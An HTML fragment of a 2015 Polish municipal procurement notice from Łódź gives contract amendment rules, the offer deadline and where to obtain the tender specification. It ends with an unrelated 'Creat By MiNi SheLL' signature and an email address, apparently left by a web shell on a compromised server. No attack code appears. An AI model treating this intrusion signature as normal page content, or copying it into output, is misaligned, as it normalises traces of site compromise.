<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności i są dopuszczalne tylko w granicach unormowania przepisu art. 144 ustawy P.z.p.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Zasobów Komunalnych Łódź - Górna; 93-129 Łódź; ul. Lubelska 9/11;
pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2015 godzina 10:00, miejsce: Administracja Zasobów Komunalnych Łódź - Górna; 93-129 Łódź; ul. Lubelska 9/11;
pokój 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com